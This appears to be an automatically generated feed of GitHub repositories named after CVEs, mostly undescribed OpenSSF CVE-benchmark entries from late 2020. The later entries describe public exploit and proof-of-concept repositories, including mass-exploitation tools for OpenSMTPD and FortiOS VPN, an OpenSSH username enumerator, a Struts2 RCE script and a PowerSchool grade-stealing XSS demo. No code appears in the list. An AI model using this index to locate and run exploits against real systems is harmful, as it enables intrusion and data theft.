**no description** : [ossf-cve-benchmark/CVE-2019-18818](https://github.com/ossf-cve-benchmark/CVE-2019-18818) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-5414](https://github.com/ossf-cve-benchmark/CVE-2019-5414) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-19507](https://github.com/ossf-cve-benchmark/CVE-2019-19507) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-16763](https://github.com/ossf-cve-benchmark/CVE-2019-16763) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-5484](https://github.com/ossf-cve-benchmark/CVE-2019-5484) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-5423](https://github.com/ossf-cve-benchmark/CVE-2019-5423) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-5413](https://github.com/ossf-cve-benchmark/CVE-2019-5413) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-17592](https://github.com/ossf-cve-benchmark/CVE-2019-17592) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-15658](https://github.com/ossf-cve-benchmark/CVE-2019-15658) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-5483](https://github.com/ossf-cve-benchmark/CVE-2019-5483) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-18954](https://github.com/ossf-cve-benchmark/CVE-2019-18954) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-18350](https://github.com/ossf-cve-benchmark/CVE-2019-18350) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-9844](https://github.com/ossf-cve-benchmark/CVE-2019-9844) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-8903](https://github.com/ossf-cve-benchmark/CVE-2019-8903) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-5479](https://github.com/ossf-cve-benchmark/CVE-2019-5479) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-16769](https://github.com/ossf-cve-benchmark/CVE-2019-16769) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-8331](https://github.com/ossf-cve-benchmark/CVE-2019-8331) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-20174](https://github.com/ossf-cve-benchmark/CVE-2019-20174) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-20149](https://github.com/ossf-cve-benchmark/CVE-2019-20149) create time: 2020-12-01T09:18:58Z

**no description** : [ossf-cve-benchmark/CVE-2019-10061](https://github.com/ossf-cve-benchmark/CVE-2019-10061) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-1020012](https://github.com/ossf-cve-benchmark/CVE-2019-1020012) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-1010266](https://github.com/ossf-cve-benchmark/CVE-2019-1010266) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10742](https://github.com/ossf-cve-benchmark/CVE-2019-10742) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-1010091](https://github.com/ossf-cve-benchmark/CVE-2019-1010091) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10758](https://github.com/ossf-cve-benchmark/CVE-2019-10758) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10757](https://github.com/ossf-cve-benchmark/CVE-2019-10757) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10767](https://github.com/ossf-cve-benchmark/CVE-2019-10767) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10750](https://github.com/ossf-cve-benchmark/CVE-2019-10750) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10781](https://github.com/ossf-cve-benchmark/CVE-2019-10781) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10761](https://github.com/ossf-cve-benchmark/CVE-2019-10761) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10747](https://github.com/ossf-cve-benchmark/CVE-2019-10747) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10777](https://github.com/ossf-cve-benchmark/CVE-2019-10777) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10759](https://github.com/ossf-cve-benchmark/CVE-2019-10759) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10775](https://github.com/ossf-cve-benchmark/CVE-2019-10775) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10778](https://github.com/ossf-cve-benchmark/CVE-2019-10778) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10776](https://github.com/ossf-cve-benchmark/CVE-2019-10776) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10771](https://github.com/ossf-cve-benchmark/CVE-2019-10771) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10746](https://github.com/ossf-cve-benchmark/CVE-2019-10746) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10785](https://github.com/ossf-cve-benchmark/CVE-2019-10785) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-14862](https://github.com/ossf-cve-benchmark/CVE-2019-14862) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-14772](https://github.com/ossf-cve-benchmark/CVE-2019-14772) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-13127](https://github.com/ossf-cve-benchmark/CVE-2019-13127) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-12041](https://github.com/ossf-cve-benchmark/CVE-2019-12041) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-15478](https://github.com/ossf-cve-benchmark/CVE-2019-15478) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-15532](https://github.com/ossf-cve-benchmark/CVE-2019-15532) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-13173](https://github.com/ossf-cve-benchmark/CVE-2019-13173) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-15482](https://github.com/ossf-cve-benchmark/CVE-2019-15482) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-12043](https://github.com/ossf-cve-benchmark/CVE-2019-12043) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-15479](https://github.com/ossf-cve-benchmark/CVE-2019-15479) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-12313](https://github.com/ossf-cve-benchmark/CVE-2019-12313) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10090](https://github.com/ossf-cve-benchmark/CVE-2019-10090) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-10744](https://github.com/ossf-cve-benchmark/CVE-2019-10744) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2019-13506](https://github.com/ossf-cve-benchmark/CVE-2019-13506) create time: 2020-12-01T09:18:57Z

**no description** : [ossf-cve-benchmark/CVE-2018-16479](https://github.com/ossf-cve-benchmark/CVE-2018-16479) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-16490](https://github.com/ossf-cve-benchmark/CVE-2018-16490) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-16491](https://github.com/ossf-cve-benchmark/CVE-2018-16491) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-18282](https://github.com/ossf-cve-benchmark/CVE-2018-18282) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-16485](https://github.com/ossf-cve-benchmark/CVE-2018-16485) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-16489](https://github.com/ossf-cve-benchmark/CVE-2018-16489) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-16492](https://github.com/ossf-cve-benchmark/CVE-2018-16492) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-16487](https://github.com/ossf-cve-benchmark/CVE-2018-16487) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-16484](https://github.com/ossf-cve-benchmark/CVE-2018-16484) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-20676](https://github.com/ossf-cve-benchmark/CVE-2018-20676) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-19048](https://github.com/ossf-cve-benchmark/CVE-2018-19048) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3718](https://github.com/ossf-cve-benchmark/CVE-2018-3718) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-20677](https://github.com/ossf-cve-benchmark/CVE-2018-20677) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-20834](https://github.com/ossf-cve-benchmark/CVE-2018-20834) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-20835](https://github.com/ossf-cve-benchmark/CVE-2018-20835) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-20801](https://github.com/ossf-cve-benchmark/CVE-2018-20801) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3719](https://github.com/ossf-cve-benchmark/CVE-2018-3719) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3712](https://github.com/ossf-cve-benchmark/CVE-2018-3712) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-21036](https://github.com/ossf-cve-benchmark/CVE-2018-21036) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3721](https://github.com/ossf-cve-benchmark/CVE-2018-3721) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3722](https://github.com/ossf-cve-benchmark/CVE-2018-3722) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3731](https://github.com/ossf-cve-benchmark/CVE-2018-3731) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3733](https://github.com/ossf-cve-benchmark/CVE-2018-3733) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3728](https://github.com/ossf-cve-benchmark/CVE-2018-3728) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3736](https://github.com/ossf-cve-benchmark/CVE-2018-3736) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3726](https://github.com/ossf-cve-benchmark/CVE-2018-3726) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3738](https://github.com/ossf-cve-benchmark/CVE-2018-3738) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3747](https://github.com/ossf-cve-benchmark/CVE-2018-3747) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3743](https://github.com/ossf-cve-benchmark/CVE-2018-3743) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3750](https://github.com/ossf-cve-benchmark/CVE-2018-3750) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3732](https://github.com/ossf-cve-benchmark/CVE-2018-3732) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3737](https://github.com/ossf-cve-benchmark/CVE-2018-3737) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3746](https://github.com/ossf-cve-benchmark/CVE-2018-3746) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3770](https://github.com/ossf-cve-benchmark/CVE-2018-3770) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3752](https://github.com/ossf-cve-benchmark/CVE-2018-3752) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3786](https://github.com/ossf-cve-benchmark/CVE-2018-3786) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-6184](https://github.com/ossf-cve-benchmark/CVE-2018-6184) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-6333](https://github.com/ossf-cve-benchmark/CVE-2018-6333) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-6342](https://github.com/ossf-cve-benchmark/CVE-2018-6342) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-7651](https://github.com/ossf-cve-benchmark/CVE-2018-7651) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3783](https://github.com/ossf-cve-benchmark/CVE-2018-3783) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-7560](https://github.com/ossf-cve-benchmark/CVE-2018-7560) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3772](https://github.com/ossf-cve-benchmark/CVE-2018-3772) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3725](https://github.com/ossf-cve-benchmark/CVE-2018-3725) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-3757](https://github.com/ossf-cve-benchmark/CVE-2018-3757) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-6341](https://github.com/ossf-cve-benchmark/CVE-2018-6341) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-20164](https://github.com/ossf-cve-benchmark/CVE-2018-20164) create time: 2020-12-01T08:06:11Z

**no description** : [ossf-cve-benchmark/CVE-2018-1002204](https://github.com/ossf-cve-benchmark/CVE-2018-1002204) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-11615](https://github.com/ossf-cve-benchmark/CVE-2018-11615) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-1002203](https://github.com/ossf-cve-benchmark/CVE-2018-1002203) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-1000620](https://github.com/ossf-cve-benchmark/CVE-2018-1000620) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-11093](https://github.com/ossf-cve-benchmark/CVE-2018-11093) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-1000086](https://github.com/ossf-cve-benchmark/CVE-2018-1000086) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-11798](https://github.com/ossf-cve-benchmark/CVE-2018-11798) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-13797](https://github.com/ossf-cve-benchmark/CVE-2018-13797) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-14380](https://github.com/ossf-cve-benchmark/CVE-2018-14380) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-13863](https://github.com/ossf-cve-benchmark/CVE-2018-13863) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-14041](https://github.com/ossf-cve-benchmark/CVE-2018-14041) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-16480](https://github.com/ossf-cve-benchmark/CVE-2018-16480) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-16461](https://github.com/ossf-cve-benchmark/CVE-2018-16461) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-16462](https://github.com/ossf-cve-benchmark/CVE-2018-16462) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-14042](https://github.com/ossf-cve-benchmark/CVE-2018-14042) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-16472](https://github.com/ossf-cve-benchmark/CVE-2018-16472) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-14040](https://github.com/ossf-cve-benchmark/CVE-2018-14040) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-16460](https://github.com/ossf-cve-benchmark/CVE-2018-16460) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-16478](https://github.com/ossf-cve-benchmark/CVE-2018-16478) create time: 2020-12-01T08:06:10Z

**no description** : [ossf-cve-benchmark/CVE-2018-1000096](https://github.com/ossf-cve-benchmark/CVE-2018-1000096) create time: 2020-12-01T07:49:09Z

**no description** : [wikiZ/cve-2018-8120](https://github.com/wikiZ/cve-2018-8120) create time: 2020-11-30T23:28:32Z

**integration examples for the CVE-2020-25860 fix** : [rauc/rauc-1.5-integration](https://github.com/rauc/rauc-1.5-integration) create time: 2020-11-30T16:39:51Z

**no description** : [ossf-cve-benchmark/CVE-2017-16029](https://github.com/ossf-cve-benchmark/CVE-2017-16029) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16084](https://github.com/ossf-cve-benchmark/CVE-2017-16084) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16031](https://github.com/ossf-cve-benchmark/CVE-2017-16031) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16034](https://github.com/ossf-cve-benchmark/CVE-2017-16034) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16082](https://github.com/ossf-cve-benchmark/CVE-2017-16082) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16026](https://github.com/ossf-cve-benchmark/CVE-2017-16026) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16042](https://github.com/ossf-cve-benchmark/CVE-2017-16042) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16098](https://github.com/ossf-cve-benchmark/CVE-2017-16098) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16117](https://github.com/ossf-cve-benchmark/CVE-2017-16117) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16087](https://github.com/ossf-cve-benchmark/CVE-2017-16087) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16043](https://github.com/ossf-cve-benchmark/CVE-2017-16043) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16083](https://github.com/ossf-cve-benchmark/CVE-2017-16083) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16119](https://github.com/ossf-cve-benchmark/CVE-2017-16119) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16107](https://github.com/ossf-cve-benchmark/CVE-2017-16107) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16137](https://github.com/ossf-cve-benchmark/CVE-2017-16137) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16114](https://github.com/ossf-cve-benchmark/CVE-2017-16114) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16100](https://github.com/ossf-cve-benchmark/CVE-2017-16100) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16138](https://github.com/ossf-cve-benchmark/CVE-2017-16138) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16224](https://github.com/ossf-cve-benchmark/CVE-2017-16224) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16118](https://github.com/ossf-cve-benchmark/CVE-2017-16118) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16877](https://github.com/ossf-cve-benchmark/CVE-2017-16877) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16226](https://github.com/ossf-cve-benchmark/CVE-2017-16226) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-5954](https://github.com/ossf-cve-benchmark/CVE-2017-5954) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-18352](https://github.com/ossf-cve-benchmark/CVE-2017-18352) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-18214](https://github.com/ossf-cve-benchmark/CVE-2017-18214) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-18353](https://github.com/ossf-cve-benchmark/CVE-2017-18353) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16136](https://github.com/ossf-cve-benchmark/CVE-2017-16136) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-18635](https://github.com/ossf-cve-benchmark/CVE-2017-18635) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-16030](https://github.com/ossf-cve-benchmark/CVE-2017-16030) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-17461](https://github.com/ossf-cve-benchmark/CVE-2017-17461) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-18077](https://github.com/ossf-cve-benchmark/CVE-2017-18077) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-18354](https://github.com/ossf-cve-benchmark/CVE-2017-18354) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-18355](https://github.com/ossf-cve-benchmark/CVE-2017-18355) create time: 2020-11-30T14:52:18Z

**no description** : [ossf-cve-benchmark/CVE-2017-1000219](https://github.com/ossf-cve-benchmark/CVE-2017-1000219) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-15010](https://github.com/ossf-cve-benchmark/CVE-2017-15010) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-1001004](https://github.com/ossf-cve-benchmark/CVE-2017-1001004) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-1000006](https://github.com/ossf-cve-benchmark/CVE-2017-1000006) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-16023](https://github.com/ossf-cve-benchmark/CVE-2017-16023) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-16006](https://github.com/ossf-cve-benchmark/CVE-2017-16006) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-16018](https://github.com/ossf-cve-benchmark/CVE-2017-16018) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-16014](https://github.com/ossf-cve-benchmark/CVE-2017-16014) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-16003](https://github.com/ossf-cve-benchmark/CVE-2017-16003) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-16011](https://github.com/ossf-cve-benchmark/CVE-2017-16011) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-10910](https://github.com/ossf-cve-benchmark/CVE-2017-10910) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-16028](https://github.com/ossf-cve-benchmark/CVE-2017-16028) create time: 2020-11-30T14:52:17Z

**no description** : [ossf-cve-benchmark/CVE-2017-1000427](https://github.com/ossf-cve-benchmark/CVE-2017-1000427) create time: 2020-11-30T14:52:17Z

**no description** : [wikiZ/cve-2014-4113](https://github.com/wikiZ/cve-2014-4113) create time: 2020-11-30T14:50:43Z

**no description** : [ossf-cve-benchmark/CVE-2017-0931](https://github.com/ossf-cve-benchmark/CVE-2017-0931) create time: 2020-11-30T14:43:26Z

**Scanning tool to test for SaltStack vulnerabilities CVE-2020-11651 & CVE-2020-11652.** : [appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652](https://github.com/appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652) create time: 2020-11-30T09:23:23Z

**This module massively scan and exploit a path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests (CVE-2018-13379).** : [Zeop-CyberSec/fortios_vpnssl_traversal_leak](https://github.com/Zeop-CyberSec/fortios_vpnssl_traversal_leak) create time: 2020-11-30T08:39:05Z

**A mass exploitation tool for CVE 2020-8793** : [rpie/OpenSMTPD](https://github.com/rpie/OpenSMTPD) create time: 2020-11-29T22:50:00Z

**OpenSSH 2.3 < 7.7 - Username Enumeration** : [Sait-Nuri/CVE-2018-15473](https://github.com/Sait-Nuri/CVE-2018-15473) create time: 2020-11-29T17:36:11Z

**CVE-2018-20966: XSS in woocommerce-jetpack < 3.8.0** : [parzel/CVE-2018-20966](https://github.com/parzel/CVE-2018-20966) create time: 2020-11-28T19:08:43Z

**Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)** : [jongmartinez/-CVE-2017-9805-](https://github.com/jongmartinez/-CVE-2017-9805-) create time: 2020-11-28T00:00:37Z

**no description** : [aslanemre/CVE-2020-29364](https://github.com/aslanemre/CVE-2020-29364) create time: 2020-11-27T17:01:35Z

**no description** : [Dirty-Racoon/CVE-2018-15473-py3](https://github.com/Dirty-Racoon/CVE-2018-15473-py3) create time: 2020-11-27T12:25:41Z

**no description** : [0x240x23elu/CVE-2020-28948-and-CVE-2020-28949](https://github.com/0x240x23elu/CVE-2020-28948-and-CVE-2020-28949) create time: 2020-11-27T11:21:46Z

**CVE-2020-2883** : [Al1ex/CVE-2020-2883](https://github.com/Al1ex/CVE-2020-2883) create time: 2020-11-26T14:10:25Z

**openssh<7.7 用户名枚举** : [coollce/CVE-2018-15473_burte](https://github.com/coollce/CVE-2018-15473_burte) create time: 2020-11-26T05:17:08Z

**A CVE-2020-17087 PoC.** : [revengsh/CVE-2020-17087](https://github.com/revengsh/CVE-2020-17087) create time: 2020-11-26T03:21:34Z

**Due to a reflected XSS vulnerability in PowerSchool (CVE-2021-29386), it is possible to view other people's grades just by having them click on a link while they are logged in to PowerSchool. This demonstrates that with a proof-of-concept.** : [Umarovm/PowerSchool-Grade-Stealer](https://github.com/Umarovm/PowerSchool-Grade-Stealer) create time: 2020-11-26T00:43:36Z

**authenticated arbitrary file read for Gitlab (CVE-2020-10977)** : [JustMichi/CVE-2020-10977.py](https://github.com/JustMichi/CVE-2020-10977.py) create time: 2020-11-25T22:48:26Z

**CVE-2020-29070 write-up.** : [aslanemre/cve-2020-29070](https://github.com/aslanemre/cve-2020-29070) create time: 2020-11-25T08:25:36Z

**no description** : [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-](https://github.com/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-) create time: 2020-11-24T07:32:39Z

**no description** : [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP](https://github.com/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP) create time: 2020-11-24T07:31:07Z

**CVE-2020-11975 CVE-2020-13942** : [1135/unomi_exploit](https://github.com/1135/unomi_exploit) create time: 2020-11-24T05:23:42Z

**no description** : [r00t4dm/CVE-2020-27955](https://github.com/r00t4dm/CVE-2020-27955) create time: 2020-11-24T02:40:04Z

**no description** : [1stPeak/CVE-2018-15473](https://github.com/1stPeak/CVE-2018-15473) create time: 2020-11-23T13:50:56Z

**修复了源项目的一个bug,若能正常使用使用源项目即可** : [A403/CVE_2017_7921_EXP](https://github.com/A403/CVE_2017_7921_EXP) create time: 2020-11-23T11:21:55Z

**PoC demonstrating the use of cve-2020-1034 for privilege escalation** : [yardenshafir/CVE-2020-1034](https://github.com/yardenshafir/CVE-2020-1034) create time: 2020-11-23T10:24:07Z

**This container was made to explain and demonstrate how CVE-2019-15813 (Sentrifugo works)** : [wolf1892/CVE-2019-15813](https://github.com/wolf1892/CVE-2019-15813) create time: 2020-11-22T10:35:24Z

**no description** : [yhsung/cve-2020-27955-poc](https://github.com/yhsung/cve-2020-27955-poc) create time: 2020-11-22T02:59:46Z

